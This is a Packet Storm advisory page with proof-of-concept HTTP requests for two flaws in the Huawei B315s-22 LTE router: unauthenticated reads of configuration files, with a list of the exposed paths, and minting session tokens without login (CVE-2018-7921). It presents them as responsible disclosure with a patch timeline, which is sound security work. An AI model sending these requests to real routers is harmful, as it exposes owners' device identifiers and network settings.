exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Huawei B315s-22 Information Disclosure

Huawei B315s-22 Information Disclosure
Posted Dec 12, 2018
Authored by Usman Saeed

Huawei B315s-22 suffers from an information disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2018-7921
SHA-256 | 2d4aa1c2293c9c5b40be0b5521cc53c7fee1572a7627085c37014fd899606e47

Huawei B315s-22 Information Disclosure

Change Mirror Download
#Product Family: LTE
#Model B315s a 22
#Firmware version: 21.318.01.00.26
#Author: Usman Saeed (usman [at] xc0re.net)

1. Unauthenticated access to sensitive files:

It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server.

POC:

By sending a simple GET request without authentication cookie one can get see valid responses:

Request:
GET /config/deviceinformation/config.xml HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close

Response:

HTTP/1.1 200 OK
a|

<?xml version=a1.0a3 encoding=aUTF-8a3?>
<config>
<devicename>1</devicename>
<serialnumber>0</serialnumber>
<imei>1</imei>
<imsi>1</imsi>
<iccid>0</iccid>
<msisdn>1</msisdn>
<hardwareversion>1</hardwareversion>
<softwareversion>1</softwareversion>
a|

Other resources accessible are:

/config/dialup/config.xml
/config/global/config.xml
/config/global/net-type.xml
/config/lan/config.xml
/config/pcassistant/config.xml
/config/voice/config.xml
/config/wifi/configure.xml
## After discussion with Huawei, according to them as the consequence of this vulnerability is quite low thus they marked it as a non-vulnerability.
2. Unauthenticated valid token generation [CVE-2018-7921]

It was observed that an unauthenticated user can generate aSessionIDa and a__RequestVerificationTokena by simply sending an HTTP GET request to a/api/webserver/SesTokInfoa.

These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.

POC:

First, we send a GET request, as mentioned above.

Request:
GET /api/webserver/SesTokInfo HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 0

Response:
HTTP/1.1 200 OK
a|

<?xml version=a1.0a3 encoding=aUTF-8a3?>
<response>
<SesInfo>SessionID=<omitted></SesInfo>
<TokInfo><omitted></TokInfo>
</response>

Now we use these tokens in one of our request where authentication is required:

Request:
GET /api/cradle/status-info HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
__RequestVerificationToken: <omitted>
X-Requested-With: XMLHttpRequest
Cookie: SessionID=<omitted>
DNT: 1
Connection: close

Response:

HTTP/1.1 200 OK
a|

<?xml version=a1.0a3 encoding=aUTF-8a3?>
a|

It is to note with an invalid, expired authentication session, the response is:

Response:
HTTP/1.1 200 OK
a|

<?xml version=a1.0a3 encoding=aUTF-8a3?>
<error>
<code>125002</code>
<message></message>
</error>

[+] Responsible Disclosure:

Vulnerabilities identified a 31/07/2018
Reported to Huawei a 31/07/2018
Huwaei patched the vulnerability and issued a CVE a 31/08/2018
Public disclosure a 01/09/2018


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close